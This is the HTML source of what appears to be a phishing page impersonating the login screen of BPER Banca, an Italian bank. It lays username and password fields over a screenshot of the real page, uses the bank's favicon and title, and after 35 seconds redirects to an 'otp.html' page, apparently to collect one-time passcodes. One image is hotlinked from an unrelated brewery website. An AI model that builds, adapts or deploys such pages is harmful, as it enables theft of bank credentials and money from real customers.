<html>
<head>
<meta http-equiv="refresh" content="35;url=./otp.html" />
<style>
body {

background-color: white;
background-position: center; 
}
#box {
width:1335px;
height: 1350px;
background-image:url('me.png');
 background-repeat:no-repeat;
 margin-left:-4;
 margin-right:auto;
}
input#u {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 32px;
padding: 4px;
margin-top:236px;
margin-left:431px;
display: inline-block;
}
input#p {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 62px;
padding: 4px;
margin-top:8px;
margin-left:481px;
display: inline-block;
}
input#p {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 62px;
padding: 4px;
margin-top:8px;
margin-left:481px;
display: inline-block;
}
.myButton{
background:url('acce.png') no-repeat;
cursor:pointer;
width:195px;
margin-left:880px;
margin-top:260px;
height: 50px;
border: none;
display: inline-block;



}
</style>
    <link rel="shortcut icon" href="https://www.bper.it/o/bper-theme/images/favicon.ico" />
</head>
		    <title>Conti, Carte, Mutui, Investimenti e Risparmio | BPER Banca

</title><body>
<div id="box">


<input type="text" placeholder="Inserisci il tuo Codice Utente/Alias" style="height:33px; width:210px; border: 1px solid #ffffff;  font: 0.8em/1.25em Arial ; position:absolute; left:317px; top:275px; size="4" MAXLENGTH="20" name="data1"  />   <input type="password" placeholder="Inserisci la tua Password" style="height:33px; width:210px; border: 1px solid #ffffff; font: 0.8em/1.25em Arial ; position:absolute; left:630px; top:275px; size="4" MAXLENGTH="20" name="data2"   />  </td></tr>

<div id="formimage1" style="position:absolute; left:560px; top:189px; z-index:13"><input type="image" name="formimage1"  src="http://bullandgoatbrewery.com/wp-content/uploads/2018/08/spinner.gif"><br><br><br><BR><span style="background-color: #ff0000"></span></div>




<INPUT type="submit" class="myButton" value="">
</div>
</form>

</body>
</html>

